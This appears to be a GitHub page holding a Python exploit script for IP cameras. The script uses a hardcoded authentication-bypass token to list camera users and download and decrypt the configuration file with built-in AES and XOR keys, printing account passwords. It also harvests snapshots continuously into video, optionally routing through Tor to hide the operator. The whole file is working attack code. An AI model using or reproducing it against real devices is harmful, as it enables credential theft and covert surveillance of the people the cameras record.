-
Notifications
You must be signed in to change notification settings - Fork 0
/
script.py
263 lines (202 loc) · 8.5 KB
/
script.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
import requests
import os
import struct
import sys
import time
import cv2
import numpy as np
from datetime import datetime
from skimage.metrics import structural_similarity as compare_ssim
# List of all users and their roles:
# http://camera.ip/Security/users?auth=YWRtaW46MTEK
# Camera snapshot:
# http://camera.ip/onvif-http/snapshot?auth=YWRtaW46MTEK
# Camera configuration:
# http://camera.ip/System/configurationFile?auth=YWRtaW46MTEK
def usage():
print("Usage: script.py -p|-s|-c IP:PORT [-t] [-r REFRESH_TIME]")
sys.exit(1)
def log_error(error_message):
current_time = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
print(f"[{current_time}] {error_message}")
def denoise_image(img):
h, w = img.shape[:2]
scale_factor = (h * w) / (1280 * 720)
h_for_denoising = int(30 * scale_factor)
template_window_size = int(7 * scale_factor)
search_window_size = int(21 * scale_factor)
dst = cv2.fastNlMeansDenoising(img, None, h_for_denoising, template_window_size, search_window_size)
return dst
def are_images_similar(img1, img2, threshold=0.99):
img1 = denoise_image(img1)
img2 = denoise_image(img2)
ssim_value, _ = compare_ssim(img1, img2, full=True)
return ssim_value >= threshold
def decrypt_with_openssl(data):
from subprocess import Popen, PIPE
cmd = [
"openssl", "enc", "-d", "-aes-128-ecb",
"-K", "279977f62f6cfd2d91cd75b889ce0c9a",
"-nosalt", "-md", "md5"
]
process = Popen(cmd, stdin=PIPE, stdout=PIPE, stderr=PIPE)
decrypted_data, _ = process.communicate(input=data)
return decrypted_data
def check_tor():
try:
proxies = {
'http': 'socks5h://127.0.0.1:9050',
'https': 'socks5h://127.0.0.1:9050'
}
response = requests.get("http://httpbin.org/ip", proxies=proxies, timeout=10)
return True
except requests.RequestException as e:
log_error(f"Error checking Tor: {e}")
return False
def images_to_video(img_folder, output_video):
images = [img for img in os.listdir(img_folder) if img.endswith(".jpg")]
images.sort()
frame = cv2.imread(os.path.join(img_folder, images[0]))
h, w, layers = frame.shape
size = (w, h)
out = cv2.VideoWriter(output_video, cv2.VideoWriter_fourcc(*'mp4v'), 1, size)
for i in range(len(images)):
img_path = os.path.join(img_folder, images[i])
img = cv2.imread(img_path)
out.write(img)
out.release()
def get_users_list(ip, port, proxies):
users = []
try:
url = f"http://{ip}:{port}/Security/users?auth=YWRtaW46MTEK"
response = requests.get(url, proxies=proxies)
if response.status_code == 200 and "<UserList" in response.text:
from xml.etree import ElementTree as ET
root = ET.fromstring(response.text)
namespace = root.tag.split('}')[0].strip('{')
for user in root.findall(f"{{{namespace}}}User"):
username = user.find(f"{{{namespace}}}userName").text
users.append(username)
except Exception as e:
log_error(f"Error fetching user list: {e}")
return users
def find_user_credentials(xor_output, users):
user_credentials = {}
for user in users:
keyword = user.encode()
start_idx = 0
while True:
start_idx = xor_output.find(keyword, start_idx)
if start_idx == -1:
break
start_idx += len(keyword)
while start_idx < len(xor_output) and xor_output[start_idx] == 0x00:
start_idx += 1
pass_start = start_idx
while start_idx < len(xor_output) and xor_output[start_idx] != 0x00:
start_idx += 1
pass_end = start_idx
password = xor_output[pass_start:pass_end].decode(errors='ignore')
if user not in user_credentials:
user_credentials[user] = []
user_credentials[user].append(password)
start_idx = pass_end
if 'admin' in user_credentials and len(user_credentials['admin']) > 1:
user_credentials['admin'] = [pwd for pwd in user_credentials['admin'] if pwd != '12345']
return user_credentials
def main():
if len(sys.argv) not in [3, 4, 6]:
usage()
option = sys.argv[1]
ip, port = sys.argv[2].split(":")
use_tor = False
if '-t' in sys.argv:
if not check_tor():
print("Tor doesn't seem to be running or there's a problem with the connection. Exiting.")
sys.exit(1)
use_tor = True
proxies = {
'http': 'socks5h://127.0.0.1:9050',
'https': 'socks5h://127.0.0.1:9050'
} if use_tor else {}
if option == '-p':
try:
users = get_users_list(ip, port, proxies)
if not users:
ip_port = f"{ip}:{port}"
print(f"{ip_port.ljust(24)}Camera is not vulnerable.")
sys.exit(0)
url = f"http://{ip}:{port}/System/configurationFile?auth=YWRtaW46MTEK"
response = requests.get(url, proxies=proxies)
decrypted_output = decrypt_with_openssl(response.content)
key = bytes([0x73, 0x8B, 0x55, 0x44])
xor_output = bytearray()
for i in range(len(decrypted_output)):
xor_output.append(decrypted_output[i] ^ key[i % len(key)])
credentials = find_user_credentials(xor_output, users)
if credentials:
for user, passwords in credentials.items():
for password in passwords:
ip_port = f"{ip}:{port}"
formatted_output = ip_port.ljust(24) + f"{user}:{password}"
print(formatted_output)
except requests.RequestException as e:
log_error(f"Error fetching configuration file: {e}")
elif option == '-s':
duplicate_wait_time = 600
duplicate_counter = 0
refresh_time = 5
if '-r' in sys.argv:
try:
refresh_time_index = sys.argv.index('-r') + 1
refresh_time = int(sys.argv[refresh_time_index])
except (ValueError, IndexError):
print("Invalid refresh time provided. Exiting.")
sys.exit(1)
if not os.path.exists("snapshots"):
os.mkdir("snapshots")
directory = os.path.join("snapshots", f"{ip}:{port}")
if not os.path.exists(directory):
os.mkdir(directory)
counter = 0
last_saved_img_matrix = None
try:
while True:
response = requests.get(f"http://{ip}:{port}/onvif-http/snapshot?auth=YWRtaW46MTEK", proxies=proxies)
if len(response.content) == 0:
print(f"Warning: Received an empty image from {ip}:{port}. Skipping this frame.")
continue
current_img_matrix = cv2.imdecode(np.frombuffer(response.content, np.uint8), cv2.IMREAD_GRAYSCALE)
if counter == 0 or (last_saved_img_matrix is None) or not are_images_similar(last_saved_img_matrix, current_img_matrix):
filename = datetime.now().strftime("%Y%m%d_%H%M%S%f")[:-3] + ".jpg"
file_path = os.path.join(directory, filename)
with open(file_path, "wb") as file:
file.write(response.content)
last_saved_img_matrix = current_img_matrix
duplicate_counter = 0
else:
duplicate_counter += 1
if duplicate_counter >= 1:
print("Duplicate image detected. Waiting 10 minutes before the next request...")
time.sleep(duplicate_wait_time)
duplicate_counter = 0
continue
counter -= 1
counter += 1
time.sleep(refresh_time)
except KeyboardInterrupt:
print("Stopped by user.")
except requests.RequestException as e:
log_error(f"Error fetching snapshot: {e}")
elif option == '-c':
directory = os.path.join("snapshots", f"{ip}:{port}")
if not os.path.exists(directory):
print(f"No images found for {ip}:{port}")
sys.exit(1)
output_video = os.path.join("snapshots", f"{ip}_{port}.mp4")
images_to_video(directory, output_video)
print(f"Video saved as {output_video}")
else:
usage()
if __name__ == "__main__":
main()